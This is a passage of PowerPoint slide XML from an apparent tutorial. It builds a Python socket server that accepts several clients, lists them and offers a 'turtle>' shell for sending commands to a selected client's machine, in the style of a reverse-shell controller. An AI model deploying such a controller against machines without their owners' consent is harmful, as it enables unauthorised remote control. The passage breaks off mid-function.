              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        port=9999 #any unknown popular no can be used as port no</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        s=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>socket.socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>    except </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>socket.error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        print("Socket creation error "+str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5B8F0BC-7AB2-45C2-BF6A-38F20BD0A55F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1188141"/>
            <a:ext cx="6094520" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>#Binding the Socket with host &amp; port no and listening for connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>bind_socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>    try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        global host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        global port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        global s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        print("Binding the Port :"+str(port))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>s.bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>host,port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>s.listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>(5) #server will continuously listen from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>varioous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t> computers and 5 is the no of bad connections after which it throws error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>    except </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>socket.error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        print("Socket Binding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>error."+str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>) + "\n" + "Retrying...")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>bind_socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>() #recursive function calling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FABBC2B6-1FBA-4F18-9246-5D1F5915DE14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5811914" y="681037"/>
            <a:ext cx="0" cy="617696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4067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DC6E-B61E-4F14-9B0F-523D935B59E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="442743"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handling Connections </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A3D2BB-A093-4150-B4E9-4D3247FB12D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="978763" y="948690"/>
            <a:ext cx="6094520" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Handling connection from multiple clients and saving to a list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t># Closing previous connections when server.py file is restarted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>accepting_connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    for c in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>c.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>[:]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>[:]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    while True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            conn, address = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>s.accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>s.setblocking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(1)  # prevents timeout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_connections.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(conn)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_address.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(address)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            print("Connection has been established :" + address[0])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        except:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            print("Error accepting connections")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3756143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FE2A-BBF0-486A-950C-477DD138D5AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607381" y="249715"/>
            <a:ext cx="10515600" cy="504887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating Interactive Custom Shell/Terminal</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FD4C7DA-0FED-4B93-81D2-C23FDAF73290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607381" y="1046526"/>
            <a:ext cx="11315330" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># 2nd thread functions - 1) See all the clients 2) Select a client 3) Send commands to the connected client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Interactive prompt/shell/terminal for sending commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># turtle&gt; list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># 0 Friend-A Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># 1 Friend-B Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># 2 Friend-C Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># turtle&gt; select 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>start_turtle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>while True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = input('turtle&gt; ')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> == 'list':</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>list_connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>elif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> 'select' in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        conn = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>get_target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        if conn is not None:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>send_target_commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(conn)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    else:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        print("Command not recognized")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3663398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CB808-8147-4DED-B711-503D8191CEC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713913" y="273805"/>
            <a:ext cx="10515600" cy="407232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Listing the Connections</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2380F63F-ED86-432F-B052-252FF523EBF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713912" y="1073160"/>
            <a:ext cx="9069279" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Display all current active connections with client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>list_connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    results = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>selectId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> =0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t># or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>selectId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>++ instead of enumerate function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>    for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>i,conn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> in enumerate(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#to check whether </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with client is still active or not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>conn.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>str.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(" "))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>conn.recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(20480)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        except:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>] #delete specific element from list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>            continue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>        results = str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>)+ " "+ str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>all_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>][0]) + " "+ str(</a:t>
            </a:r>
            <a:r>
